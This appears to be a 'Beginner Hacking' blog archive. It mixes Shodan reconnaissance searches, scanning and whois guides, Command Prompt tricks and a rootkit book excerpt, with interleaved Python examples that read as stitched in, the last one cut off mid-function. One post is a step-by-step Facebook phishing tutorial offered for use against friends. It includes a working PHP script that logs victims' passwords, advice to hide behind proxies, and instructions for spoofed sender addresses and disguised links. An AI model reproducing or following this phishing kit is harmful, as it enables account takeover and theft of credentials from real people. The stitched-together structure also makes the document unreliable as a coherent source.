Category Archives: (C) Beginner Hacking

Shodan a Search Engine for Hackers

Many people have described Shodan as a search engine for hackers, and some have even called it “the world’s most dangerous search engine”. It was created by John Matherly in 2009, and unlike a general-purpose search engine it collects the kind of specific information about exposed systems that is invaluable to an attacker. Matherly describes himself as an Internet cartographer, which is a fair summary of what Shodan does: it maps what is connected to the Internet.

Shodan is a search engine for Internet-connected devices and for explicit details about them, such as the software running on a particular system or which hosts run an anonymous FTP server. It can be used much like Google, but it indexes service banners: the metadata a server sends back to a client that connects to it. For the best results, Shodan searches should be built from filters combined in a single query string (for example a port filter plus a country filter) rather than from free-text keywords alone.

In short, Shodan is a search engine for finding specific devices, and device types, that are exposed online. It works like a map of the Internet: it lets us see what is connected, which ports are open on a given device, and what operating system a given system runs. Rather than locating pages that match a search term, Shodan is designed to help the user find specific nodes (desktops, servers, routers, switches and so on) whose banners contain specific content.

What Shodan can do?

Shodan pulls service banners from servers and devices on the Internet, mostly from port 80, but also from ports 21 (FTP), 22 (SSH), 23 (Telnet), 161 (SNMP) and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, Shodan can find innumerable web-enabled servers, network devices, home security systems and so on: webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems of the kind that control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it. Although many of these systems communicate over HTTP on port 80, many use Telnet or other protocols on other ports, so keep that in mind when trying to connect to them.

How to use Shodan?

Understanding Shodan is important. At first you might find it complex, but once you get to know it you will find it very handy and very resourceful. To use Shodan to your advantage you first have to register an account. Follow the steps to register; after registration an activation link will be sent to your e-mail address. Once your account is activated, log in to Shodan and you are free to search for anything.

Here are some example searches you can run on Shodan to find the things you want.

Webcam

When you search for webcam, it lists every device in Shodan’s index whose banner mentions a webcam. The results look like the image below:

Traffic Signals

Searching for traffic signals or traffic signal cameras lists the traffic surveillance cameras in the index.

Cisco

Searching for cisco lists Cisco routers worldwide, and you can narrow the search to a country. Here, for example, I searched for Cisco routers in India; the result is shown in the image below:

Scada

You can also search for scada and get results for SCADA systems around the whole world, as shown:

netcam

Shodan can also show you the netcams in its index.

GPS

Shodan even lets you find GPS devices all over the world; just type gps in the search box.

Port

Not only devices: it can also tell you which ports are open on which device. For example, here I searched port:1723. TCP port 1723 is used by PPTP VPNs, so this search lists devices exposing a PPTP VPN endpoint, as shown in the image below:

When you search port:3389 (Remote Desktop), the results also show the operating system of each device, which can be very useful.

This is how Shodan is useful to an attacker: it provides much of the reconnaissance information needed before an attack, for targets all over the world, and you can pivot on that information however you wish.
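To make the “banner” idea concrete, here is an added example (not part of the original post, and not Shodan’s own code) that does in miniature what Shodan does at scale: connect to a port, read what the service says first, and extract the fields a filter such as port:22 keys on. HTTP servers only answer after a request, so those ports get a minimal HEAD request; SSH, FTP and SMTP greet the client on their own. The matches() function is an illustrative evaluator for a handful of filter terms, not Shodan’s real query grammar (it treats every value as a substring, so port:2 would also match port 22), and the banners used in testing are constructed.

```python
import re
import socket

# Added example, not Shodan's code: fetch and parse the service banners
# that a search engine like Shodan indexes.

# Ports where the client must speak first; everything else (SSH, FTP, SMTP,
# Telnet...) sends its greeting as soon as the connection opens.
HTTP_PORTS = {80, 8080, 8000, 8888}

SERVER_HEADER = re.compile(rb"^Server:[ \t]*(.+?)\r?$", re.IGNORECASE | re.MULTILINE)


def grab_banner(host, port, timeout=3.0):
    """Connect to host:port and return the raw banner bytes (live network call)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port in HTTP_PORTS:
            s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode("idna") + b"\r\n\r\n")
        return s.recv(4096)


def parse_banner(port, raw):
    """Turn a raw banner into the indexable fields a Shodan-style filter keys on."""
    text = raw.decode("latin-1")
    first = text.split("\n", 1)[0].strip()
    info = {"port": port, "product": "", "raw": first}
    if first.startswith("SSH-"):
        # "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3" -> protocol "2.0", software is the rest
        parts = first.split("-", 2)
        info["version"] = parts[1] if len(parts) > 1 else ""
        info["product"] = parts[2] if len(parts) > 2 else ""
    elif first[:3].isdigit() and first[3:4] in (" ", "-"):
        # FTP/SMTP style numeric greeting: "220 (vsFTPd 3.0.3)"
        info["status"] = first[:3]
        info["product"] = first[4:].strip()
    elif first.startswith("HTTP/"):
        # Status line plus the Server: header, the field most HTTP searches use
        m = SERVER_HEADER.search(raw)
        info["status"] = first.split(" ", 2)[1] if " " in first else ""
        info["product"] = m.group(1).decode("latin-1").strip() if m else ""
    else:
        info["product"] = first
    return info


def matches(info, query):
    """Evaluate a tiny subset of Shodan-style filters against parsed fields.
    key:value terms are case-insensitive substring matches on info[key];
    bare words must appear in the product string. Illustrative only."""
    for term in query.split():
        key, sep, value = term.partition(":")
        field = info.get(key) if sep else info.get("product")
        needle = value if sep else term
        if field is None or needle.lower() not in str(field).lower():
            return False
    return True


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])
    print(parse_banner(port, grab_banner(host, port)))
```

Run it against a host you are allowed to probe (python3 banner.py 192.0.2.10 22) and you see exactly the kind of record Shodan stores; the search engine simply does this for every routable address and every interesting port, and keeps the results searchable.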

Using Whois From Command Prompt In Windows

Here we will see how to use whois from the Command Prompt in Windows.

Step 1: Download whois from here (Sysinternals).

Alternate Link : https://technet.microsoft.com/en-us/sysinternals/whois.aspx

Step 2: Open a Command Prompt and change to the folder where you extracted the whois zip. In our case it is C:\tools\WhoIs.

Step 3: Type whois followed by the domain name or IP address you want to look up.

Example: whois yahoo.com, then press Enter.
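What the Sysinternals tool does on the wire is simple enough to write yourself, and seeing it explains two things a practitioner should know: WHOIS is an unauthenticated plaintext protocol (RFC 3912, TCP port 43), and a single lookup is really a chain of referrals from IANA to the TLD registry to the registrar. The client below is an added example, not the Sysinternals code; the server name whois.iana.org is the real IANA root server, while the replies in the test are constructed to mimic the “refer:” and “Registrar WHOIS Server:” lines real registries return.

```python
import socket

# Added example, not the Sysinternals tool's code: a minimal WHOIS client.
# RFC 3912: send the query plus CRLF to TCP port 43 and read until the
# server closes the connection. The reply is free-form text, and each
# registry points you onward with a referral line, so a lookup usually takes
# two or three hops: IANA -> TLD registry -> registrar.

IANA_WHOIS = "whois.iana.org"

# Keys of lines that carry a referral. "refer:" is what IANA uses; the others
# appear in TLD-registry and registrar replies.
REFERRAL_KEYS = ("refer", "whois server", "registrar whois server", "whois")


def whois_query(server, query, timeout=10.0):
    """One round trip over TCP/43; returns the reply as text (live network call)."""
    with socket.create_connection((server, 43), timeout=timeout) as s:
        s.sendall(query.encode("idna") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:          # server closes the socket when it is done
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def find_referral(reply):
    """Return the next WHOIS server named in a reply, or None if there is none."""
    for line in reply.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() in REFERRAL_KEYS:
            value = value.strip()
            if value:
                return value.split()[0].lower()
    return None


def whois(query, max_hops=4):
    """Follow referrals from IANA to the most specific server.
    Returns (server that answered last, its reply)."""
    server, seen = IANA_WHOIS, set()
    while True:
        seen.add(server)
        reply = whois_query(server, query)
        nxt = find_referral(reply)
        if not nxt or nxt in seen or len(seen) >= max_hops:
            return server, reply
        server = nxt


if __name__ == "__main__":
    import sys
    server, reply = whois(sys.argv[1] if len(sys.argv) > 1 else "yahoo.com")
    print("# final answer from", server)
    print(reply)
```

Because every hop is plaintext, anyone on the path (and every registry queried) learns which domains and addresses you are researching; that matters during a quiet reconnaissance phase, and it is why the page’s suggestion to run whois from the Command Prompt deserves the same care as any other outbound probe.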

For queries, comment below.

Angry IP Scanner – How to Use and Download

What is Angry IP Scanner?

Angry IP Scanner is a simple, fast and effective portable program for scanning IP ranges and collecting details about the hosts it finds. It is free, and you can download it from its SourceForge page.

Supported Operating System

  • Windows XP
  • Windows VISTA
  • Windows 7
  • Windows 8
  • Windows 10
  • Mac OS X
  • Linux
  • UBUNTU

It will work with earlier versions of Windows, but support is very limited.

Is this a virus?

No, it is not a virus. It is a simple network tool designed for system administrators and network professionals. Some antivirus products show a warning for it because port scanners are also part of an attacker’s toolkit; that is a false positive. Ignore it or add the program to the allow list.

Features :

Some of the brilliant features of Angry IP Scanner are:
  1. Small and efficient
  2. Fast port scanner
  3. Reverse DNS lookup of IP addresses
  4. MAC address lookup
  5. Complete IP range support from 1.0.0.1 to 255.255.255.255
  6. Automatic OS detection
  7. No adware, malware or advertising pop-ups
  8. Additional network configuration tools

How to Use Angry IP Scanner Tutorial

If you are a home user with a single computer, there is not much to do with this tool apart from scanning your own network range and finding open ports on the devices connected to it. Make sure you do not break the law: scanning networks you do not own or have permission to test is illegal in many countries.
Network admins will love this tool for what it can achieve in a few seconds (depending on the size of the IP range you are exploring). These are some of the things that can help you with your network management:

Scan for Open ports

  1. Specify the IP range of your network
  2. Enter Hostname
  3. Select Netmask from the drop down
  4. Press the start button
  5. Wait till complete scan is completed
Hosts shown in red are dead (they did not respond) and those shown in blue are alive. By default you are shown the ping time, hostname and ports for each IP address.
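To see what such a scan actually does on the network, here is an added example (not Angry IP Scanner’s code) of its core operation: a threaded TCP connect() sweep over an address range. A connect() probe completes the full three-way handshake, so every probed port sees a real connection and a target with logging will record it; that is the trade-off for needing no raw-socket privileges. The demo function builds its own loopback listener so the example runs without touching any real network; scan_hosts() itself takes any CIDR range and port list, but only point it at networks you own or have written permission to test.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

# Added example, not Angry IP Scanner's code: the core of what such a tool
# does, a threaded TCP connect() sweep over an address range.


def tcp_open(host, port, timeout=0.5):
    """Full TCP handshake probe. True if something accepted the connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, timed out, unreachable, filtered
        return False


def scan_hosts(network, ports, timeout=0.5, workers=64):
    """Probe each host in `network` (CIDR string) on `ports`.
    Returns {host: [open ports]} containing only hosts with an open port."""
    net = ipaddress.ip_network(network, strict=False)
    # hosts() strips network/broadcast addresses; a /31 or /32 has none to strip
    hosts = list(net.hosts()) if net.num_addresses > 2 else list(net)
    targets = [(str(h), p) for h in hosts for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        flags = list(pool.map(lambda t: tcp_open(t[0], t[1], timeout), targets))
    found = {}
    for (host, port), is_open in zip(targets, flags):
        if is_open:
            found.setdefault(host, []).append(port)
    return found


def demo_scan_localhost():
    """Constructed check that touches no real network: open one loopback
    listener, then scan its port plus one port known to be closed.
    Returns (scan result, open port, closed port)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))      # port 0: kernel picks a free one
    listener.listen(5)
    open_port = listener.getsockname()[1]
    spare = socket.socket()
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                        # freed again, nothing listens there now
    try:
        found = scan_hosts("127.0.0.1/32", [open_port, closed_port])
    finally:
        listener.close()
    return found, open_port, closed_port


if __name__ == "__main__":
    import sys
    ports = [int(p) for p in sys.argv[2:]] or [22, 80, 443]
    print(scan_hosts(sys.argv[1], ports))
```

Angry IP Scanner pings hosts first and only port-scans the ones that answer, which is faster on a sparse range; the example probes every address because hosts that drop ICMP (most hardened servers) would otherwise be missed.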

Look up MAC address

  1. Follow the same steps as above
  2. Right-click any IP whose MAC address you want to know
  3. Select Show details
  4. You will now be shown the MAC address and other details

MAC addresses are learned from ARP, so this only works for hosts on the same local network segment as the scanning machine; for hosts behind a router the field stays empty.

Search for all open ports

  1. Select the IP address you want to check for open ports
  2. Right-click it and select Scan all ports
  3. Get the complete list in a few seconds

There are many additional tasks you can do with this open source program. You can join the discussion here.

Download Angry IP Scanner

Use the links on the project’s SourceForge page mentioned above to download the program to your computer.
If you have any problems using this program you can ask for help in the comments section. Use this program responsibly.

15 Useful Command Prompt Tricks You Might Not Know

1. Get help on almost every Command

This is especially helpful for beginners, but advanced users may learn a few things too. You can get information on almost every command you can run in the Command Prompt: a description of what the command does, the switches it accepts, and sometimes examples.

To get the help, just type “/?” after the command you want information on. For example, type “ipconfig /?” and you will get all the information about ipconfig.

2. Use Function Keys

You can use the function keys (F1, F2, F3 and so on) right inside the Command Prompt to recall and edit previous commands. Below are the uses of the function keys in the Command Prompt:

  • F1: Pastes the last command one character at a time
  • F2: Pastes the last command up to (but not including) a character you specify
  • F3: Pastes the whole of the last command
  • F4: Deletes from the cursor up to a character you specify
  • F5: Cycles backwards through previously used commands
  • F6: Pastes ^Z (the end-of-file character)
  • F7: Shows a selectable list of previously used commands
  • F8: Cycles through previous commands that start with the text you have already typed
  • F9: Lets you pick a command from the history by its number (as listed by F7)

3. Save a Command’s Output to a File

If you want to save the output of a command to a .txt file for future reference, that is easy as well. All you need to do is add “> (destination\file name with .txt extension)” at the end of the command you are about to execute. A single “>” overwrites the file each time; use “>>” instead to append to it.

For example, “ipconfig > c:\Networkdetails.txt” creates a file named Networkdetails.txt in the root of the C drive containing the output of ipconfig.

4. Copy Data from the Command Prompt

Copying data from the Command Prompt is not just a Ctrl+C away; the process is different. It is not hard: right-click anywhere in the window and click “Mark” in the menu. Then select the text you want to copy and press Enter to copy it.

Important note: in Windows 10, Ctrl+C and Ctrl+V work for copy and paste in the Command Prompt, so you do not need the process above. Keyboard shortcuts in the Command Prompt are enabled by default in Windows 10, which was not the case in earlier versions of Windows.

5. Cycle Through Folders

Typing exact directory paths can be frustrating if you do not have the path to hand. If you know which drive or folder the target folder is in, you can cycle through the folders to reach it: type the drive letter or the start of the path and press the Tab key repeatedly to cycle through all the matching folders inside it.

6. Use QuickEdit Mode

The Command Prompt has a QuickEdit Mode for quickly copying and pasting with the mouse. In QuickEdit mode you can highlight content and right-click to copy it, or right-click in a blank area to paste the contents of the clipboard (if there are any).

To enable QuickEdit Mode, right-click the title bar of the Command Prompt window (where the close button is) and select “Properties”. In the properties, tick the checkbox next to “QuickEdit Mode”. You can disable it again the same way later.

7. Check IP address of any Website

You can see the IP address of any website by entering the “nslookup” command followed by the name of the website. For example, type “nslookup beebom.com” to find its IP address. The query goes to the DNS server configured for your network connection, which is also shown in the output.

8. Execute Multiple Commands

You can easily run one command after another by putting “&&” between them, which may save some time. For example, “ipconfig && dir” runs both commands one after the other. Note that “&&” only runs the second command if the first one succeeded; use a single “&” to run the second command regardless.

9. Check Default Programs

You can check which file type each file extension maps to. Just type “assoc” in the Command Prompt and press Enter, and you will see every extension with its associated file type next to it. To see which program opens a given file type, use “ftype”.

10. Get PC Drivers List

You can list all the drivers installed on your PC with a single command. Just type “driverquery” in the Command Prompt and press Enter. After a short delay you will see all the drivers installed on your PC along with their name, type and link date.

11. Scan System Files

The system files can also be scanned and repaired from the Command Prompt. Open the Command Prompt as administrator (the command needs elevation), type “sfc /scannow” and press Enter. The scan may take quite some time depending on your PC (up to an hour, maybe). It will either repair the files automatically or tell you that there is a problem and provide its details.

12. Change Command Prompt Color

You can also change the Command Prompt colours to make it look less dull and a bit easier on the eyes. To do so, right-click the title bar of the Command Prompt window and select “Properties” from the menu. In the properties, go to the “Colors” tab, where you will find the options to change the colour of both text and background.

13. Create Undelete-able Folders

You can create folders that Explorer cannot delete or rename by using a reserved device name. In the Command Prompt, switch to the drive where you want the folder (it must not be the drive Windows is installed on). Then type “md con\” or “md lpt1\” and press Enter, so it looks something like “D: md con\”.

This creates a folder with that name that cannot be deleted or renamed from Explorer: con and lpt1 are reserved device names in Windows, so the normal file dialogs refuse to touch the folder. To delete it, use “rd con\” or “rd lpt1\” in the same way.

14. Get Network Details

You can get quick network details, such as your IP address, subnet mask and default gateway, with a single command. Type “ipconfig” and press Enter to see the details of your network connections; “ipconfig /all” adds the MAC addresses, DHCP and DNS servers.

15. Hide Files and Folders using Command Prompt

You can hide a folder with the Command Prompt in a way the ordinary Hide option in Windows does not. Type the letter of the drive where the folder is located, then the command “attrib +h +s +r” followed by the name of the file or folder you want to hide, so it looks something like “D: attrib +h +s +r haider”. The +s (system) attribute is what keeps the folder out of Explorer even with “Show hidden files” turned on, because Explorer also hides protected operating-system files by default. This is concealment, not protection: “dir /a” in the Command Prompt lists it, and unticking “Hide protected operating system files” in Folder Options shows it again.

If the folder is inside another folder, give the full path after the command rather than just the drive letter. To make the folder visible again, run the same command with “attrib -h -s -r” instead of “attrib +h +s +r”.

Know when someone opens your email and get reminders to follow up

Find out when, how many times and from which recipient your message was opened, and get the option to auto-create follow-up reminders for it.

Install the Chrome extension FollowUp and sign in using whatever method you prefer. You will also need to grant the app permission to manage your Gmail. Once it is installed, you will see new options in your Gmail compose window, including the option to track that email, send it later, and more.

Learn Best Search Engine Hacks Of All Time

1. Search Exact Phrases – If you’re looking for an exact phrase, use quotation marks around the keywords to view results containing that exact phrase.

2. Exclude a word – If your search terms contain a keyword with several meanings, you can exclude one of the meanings by adding a hyphen (-) before the keyword.

3. Search a specific domain – You can search within a particular URL by including the operator site:example.com before or after your keywords.

4. Find similar sites – To find sites similar to one whose URL you already know, use the related: operator before the URL.

5. Search for words in text – To retrieve pages where all the keywords appear in the body of the page, use the allintext: operator before the search terms.

6. Search for words in title – Similar to number 5, you can retrieve pages whose titles contain the keywords you’re searching for by using the allintitle: operator.

7. Search for multiple phrases – You can enter more than one query into Google at a time to view pages with one of the specified keywords. Just use a capitalised “OR” to separate the terms.

8. Find news by location – To look for news items from a particular place, use the location: operator in Google News followed by the city name.

9. Search by file type – If you’re looking for a specific file on the Web, you can use the filetype: operator to specify the particular document type you’re searching for, and Google will restrict results to pages containing those document types.

10. Forgotten words – An asterisk acts as a wildcard to help you find the missing word in a phrase. You can also get suggestions by using Google’s auto-completion feature. Just type out the full phrase, then delete the word you want to replace.

11. Find pages that link to another URL – Using the link: operator, you can find pages that link to a given URL. This is mostly useful to SEOs looking for backlinks to a specific page. Google has since retired the link: operator, so it no longer returns reliable results.

12. Perform calculations on Google Search – You can simply type in the equation and get the result instantly.

13. Find exact sunrise and sunset times in any location

14. Find exact scores of sport games simply by entering the team name or competition.

15. Use Google to determine the local time of any city.

16. Find your public IP address.

17. You don’t need a dictionary; just ask Google.

18. Search for books by your favourite author.

19. And music from your favourite artist.

20. You can view flight schedules on Google.

21. Google can convert between units.

22. And translate from one language to another.

23. Use Google as a countdown timer.

24. Track your packages by entering any UPS, USPS or FedEx tracking number directly into Google to see tracking information about your package.

25. Use Google to view the weather forecast for different cities.

With these hacks you can improve your productivity by searching Google more efficiently and find the information you are looking for faster, without clicking through multiple pages. Let us know your thoughts in the comments section below.

How to Hack Facebook Account Using Phising webPage

Everyone is eager to get into other people’s Facebook accounts. Here is the simplest method, a phishing web page, with which you can capture the Facebook credentials of your friends.

Phishing WebPage:
Building a web page that looks exactly like a real site’s login page is the core of phishing. With a phishing web page you make users believe they are on the original website, so they enter their ID and password into your copy.

Step 1:
Go to Facebook.com
Right-click on the white space of the front page and select “View Page Source”.
Copy the code into Notepad.

Step2:
Now search (press Ctrl+F) for “action=” in that code.
You will find code like this:

The action= value (the big red ring in the picture) is what you have to change: set it to action="next.php". The form method (the small red circle in the picture) must match the way next.php reads the submitted fields. The script below reads them from $_POST, so keep method="post". Save the document as index.html.

Step 3:
Now we need to create next.php, the script that stores the submitted password. Open Notepad and type the following code:

<?php
// Send the victim straight on to the real login page so nothing looks wrong.
header("Location: http://www.Facebook.com/login.php");
// Append every submitted form field to the capture file, one "name=value" per line.
$handle = fopen("pswrds.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this file as “next.php”.

Update: I have updated the PHP script. Now it is working! Rectified all the problems and errors.

Step 4:
Open Notepad and save an empty file as “pswrds.txt”.

Now upload the three files (index.html, next.php and pswrds.txt) to any free subdomain web hosting site.
Note: the web hosting service must support PHP.
Use one of these sites: 110mb.com, spam.com, justfree.com or 007sites.com.
Use these sites through a proxy site (so that your IP address is hidden), such as http://flyproxy.com; find the best one you can.

Step 5:
Create an e-mail account with the Facebook keyword in its name, such as FACEBOOK@hotmail.com, Facebook@noreply.com, facebook_welcome@hotmail.com or facebook_friends@gmail.com.

Step 6 :

Copy the original Facebook friendship invitation and paste it into your mail.
Remove the hyperlink from this: http:/www.facebook.com/n/?reqs.php
Select it and press the Add hyperlink button.
*Updated*
Everyone is asking about this 6th step. You get a Facebook friendship invitation from Facebook when someone adds you as a friend, right? Just copy that mail and paste it into a new compose window. In that content you will find this link: http:/www.facebook.com/n/?reqs.php . Delete the link and create a new link with the same text but pointing to your site.

The Add hyperlink button is in the red circle. Now write your phisher page URL in the hyperlink bar that appears after clicking the button, and click Add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.

Note:
To make users believe it, replace your phishing page’s URL with one from a free short-URL or free-domain service,
such as co.nr, co.cc or cz.cc.
This makes users believe it is the correct URL.

How you can use your Smartphone as a keyboard, mouse and a remote control for your PC

Controlling a PC with a mouse and a keyboard is what everybody does, but there is another cool way of interacting with a PC: you can use your smartphone as a controller.

You can use your smartphone as a PC controller using a smartphone app and PC app combo called Unified Remote.

The app you install on your phone talks to the server app installed on your PC. The mobile app sends mouse, keyboard and other remote-control input to the server app.

The features YouTube and the VLC media player offer for streaming media to a PC and controlling it from your smartphone are good, but they are limited to a fixed set of actions. The best way around this is to use your smartphone as a general mouse and keyboard.

The app we mentioned above, Unified Remote works very well for this. The standard version is free, with a paid version offering additional specialized remote functions. The free version will let you use your phone as a mouse, keyboard, and give you access to other media remote functions. You can install the app on an iPhone, Android phone, or even a Windows Phone. You can use it to control a Windows, Mac, or Linux PC. So whatever devices you have, Unified Remote should work for you. It can communicate with your computer using Wi-Fi or Bluetooth.

Installations in PC side

From the official Unified Remote website, download Unified Remote for Windows, Mac or Linux. When the download finishes, run it and go through the installation process. On Windows, this installs an input driver that allows Unified Remote to control your computer.

After completing the above step, the installer should automatically launch Unified Remote.

The process is same in Linux and Mac OS X.

Installing in Mobile side

Now you have to install the Unified Remote app for Android, iPhone, or Windows Phone. After launching the app on your phone, tap the “I have installed the server” button. The app will scan your local network to find a computer running the server, so be sure your phone is on the same Wi-Fi network as your computer.

Now you can use your smartphone as a mouse, and you will find it more comfortable than sitting on a sofa consuming media and struggling to control the cursor with a mouse in an awkward position.

Other common trackpad actions like a single tap to click and a two-finger drag to scroll up and down will also work. From the Basic Input screen, you can tap the keyboard icon at the bottom-left corner of the screen to pull up your smartphone keyboard. Type on the keyboard and it’ll send that input to your computer.

Now that you have Unified Remote installed, explore it and find new inputs you can give using your smartphone.

The Basics of Rootkits

What Is a Rootkit?

The term rootkit has been around for more than 10 years. A rootkit is a “kit” consisting of small and useful programs that allow an attacker to maintain access to “root,” the most powerful user on a computer. In other words, a rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer.

In our definition of “rootkit,” the key word is “undetectable.” Most of the technology and tricks employed by a rootkit are designed to hide code and data on a system. For example, many rootkits can hide files and directories. Other features in a rootkit are usually for remote access and eavesdropping—for instance, for sniffing packets from the network. When combined, these features deliver a knockout punch to security.

Rootkits are not inherently “bad,” and they are not always used by the “bad guys.” It is important to understand that a rootkit is just a technology. Good or bad intent derives from the humans who use them. There are plenty of legitimate commercial programs that provide remote administration and even eavesdropping features. Some of these programs even use stealth. In many ways, these programs could be called rootkits. Law enforcement may use the term “rootkit” to refer to a sanctioned back-door program—something installed on a target with legal permission from the state, perhaps via court order. (We cover such uses in the section Legitimate Uses of Rootkits later in this chapter.) Large corporations also use rootkit technology to monitor and enforce their computer-use regulations.

By taking the attacker’s perspective, we guide you through your enemies’ skills and techniques. This will increase your skills in defending against the rootkit threat. If you are a legitimate developer of rootkit technology, this book will help you build a base of skills that you can expand upon.

Why Do Rootkits Exist?

Rootkits are a relatively recent invention, but spies are as old as war. Rootkits exist for the same reasons that audio bugs exist. People want to see or control what other people are doing. With the huge and growing reliance on data processing, computers are natural targets.

Rootkits are useful only if you want to maintain access to a system. If all you want to do is steal something and leave, there is no reason to leave a rootkit behind. In fact, leaving a rootkit behind always opens you to the risk of detection. If you steal something and clean up the system, you may leave no trace of your operation.

Rootkits provide two primary functions: remote command and control, and software eavesdropping.

Remote Command and Control

Remote command and control (or simply “remote control”) can include control over files, causing reboots or “Blue Screens of Death,” and accessing the command shell (that is, cmd.exe or /bin/sh). Example 1-1 shows a command menu from a rootkit. This command menu will give you an idea of the kinds of features a rootkit might include.

Example 1-1. Menu for a kernel rootkit.

Win2K Rootkit by the team rootkit.com
Version 0.4 alpha
-----------------------------------------
command       description
ps            show process list
help          this data
buffertest    debug output
hidedir       hide prefixed file or directory
hideproc      hide prefixed processes
debugint      (BSOD)fire int3
sniffkeys     toggle keyboard sniffer
echo <string> echo the given string
*"(BSOD)" means Blue Screen of Death
  if a kernel debugger is not present!
*"prefixed" means the process or filename
  starts with the letters '_root_'.
*"sniffer" means listening or monitoring software. 

Software Eavesdropping

Software eavesdropping is all about watching what people do. This means sniffing packets, intercepting keystrokes, and reading e-mail. An attacker can use these techniques to capture passwords and decrypted files, or even cryptographic keys.

Legitimate Uses of Rootkits

As we alluded to already, rootkits can be used for legitimate purposes. For instance, they can be used by law-enforcement agencies to collect evidence, in an advanced bugging operation. This would apply to any crime in which a computer is used, such as computer trespass, creating or distributing child pornography, software or music piracy, and DMCA [10] violations.

Rootkits can also be used to fight wars. Nations and their militaries rely heavily on computing machinery. If these computers fail, the enemy’s decision cycle and operations can be affected. The benefits of using a computer (versus conventional) attack include that it costs less, it keeps soldiers out of danger, it causes little collateral damage, and in most cases it does not cause permanent damage. For instance, if a nation bombs all the power plants in a country, then those power plants will need to be rebuilt at great expense. But if a software worm infects the power control network and disables it, the target country still loses use of the power plants’ output, but the damage is neither permanent nor as expensive.

How Long Have Rootkits Been Around?

As we noted previously, rootkits are not a new concept. In fact, many of the methods used in modern rootkits are the same methods used in viruses in the 1980s—for example, modifying key system tables, memory, and program logic. In the late 1980s, a virus might have used these techniques to hide from a virus scanner. The viruses during this era used floppy disks and BBS’s (bulletin board systems) to spread infected programs.

When Microsoft introduced Windows NT, the memory model was changed so that normal user programs could no longer modify key system tables. A lapse in hard virus technology followed, because no virus authors were using the new Windows kernel.

When the Internet began to catch on, it was dominated by UNIX operating systems. Most computers used variants of UNIX, and viruses were uncommon. However, this is also when network worms were born. With the famous Morris Worm, the computing world woke up to the possibility of software exploits. [11] During the early 1990s, many hackers figured out how to find and exploit buffer overflows, the “nuclear bomb” of all exploits. However, the virus-writing community didn’t catch on for almost a decade.

During the early 1990s, a hacker would penetrate a system, set up camp, and then use the freshly compromised computer to launch new attacks. Once a hacker had penetrated a computer, she needed to maintain access. Thus, the first rootkits were born. These original rootkits were merely backdoor programs, and they used very little stealth. In some cases, they replaced key system binaries with modified versions that would hide files and processes. For example, consider a program called ls that lists files and directories. A first-generation rootkit might replace the ls program with a Trojan version that hides any file named hacker_stuff. Then, the hacker would simply store all of her suspect data in a file named hacker_stuff. The modified ls program would keep the data from being revealed.

System administrators at that time responded by writing programs such as Tripwire [12] that could detect whether files had been changed. Using our previous example, a security utility like Tripwire could examine the ls program and determine that it had been altered, and the Trojan would be unmasked.

The natural response was for attackers to move into the kernel of the computer. The first kernel rootkits were written for UNIX machines. Once they infected the kernel, they could subvert any security utility on the computer at that time. In other words, Trojan files were no longer needed: All stealth could be applied by modifying the kernel. This technique was no different from the techniques used by viruses in the late 1980s to hide from anti-virus software.
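The Tripwire idea from the paragraphs above is small enough to show in full. The following is an added example, not Tripwire’s code: take a baseline of trusted binaries from a known-good state, store it somewhere the machine cannot rewrite it, and later compare. The demo function constructs the exact scenario the text describes, a first-generation rootkit replacing ls with a Trojan that hides hacker_stuff and dropping that file, in a temporary directory; the file contents are constructed stand-ins, not a real system. The caveat the chapter makes next applies: once the kernel is subverted, the checker is reading through a lying kernel, so the comparison only means something when the files are read from a trusted boot medium or an offline image.

```python
import hashlib
import json
import os
import tempfile

# Added example, not Tripwire's code: a file-integrity baseline in miniature.
# Hash the trusted binaries once from a known-good state, keep that database
# off the machine (or on read-only media), and later compare against it.


def file_digest(path):
    """SHA-256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root):
    """{relative path: {size, mode, sha256}} for every regular file under root.
    Content hash, not mtime: an intruder can restore timestamps in one call."""
    db = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.lstat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            db[rel] = {"size": st.st_size, "mode": st.st_mode, "sha256": file_digest(full)}
    return db


def compare(old, new):
    """Report paths whose record changed, paths that appeared, paths that vanished."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def save_db(db, path):
    """Write the baseline as JSON; keep this file where the monitored host cannot edit it."""
    with open(path, "w") as f:
        json.dump(db, f, indent=1, sort_keys=True)


def load_db(path):
    with open(path) as f:
        return json.load(f)


def demo_trojaned_ls():
    """Constructed scenario from the text: a first-generation rootkit swaps
    bin/ls for a version that filters out 'hacker_stuff', then drops that file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        for name in ("ls", "ps"):                       # stand-in "system binaries"
            with open(os.path.join(root, "bin", name), "wb") as f:
                f.write(b"#!/bin/sh\n/bin/" + name.encode() + b' "$@"\n')
        before = baseline(root)
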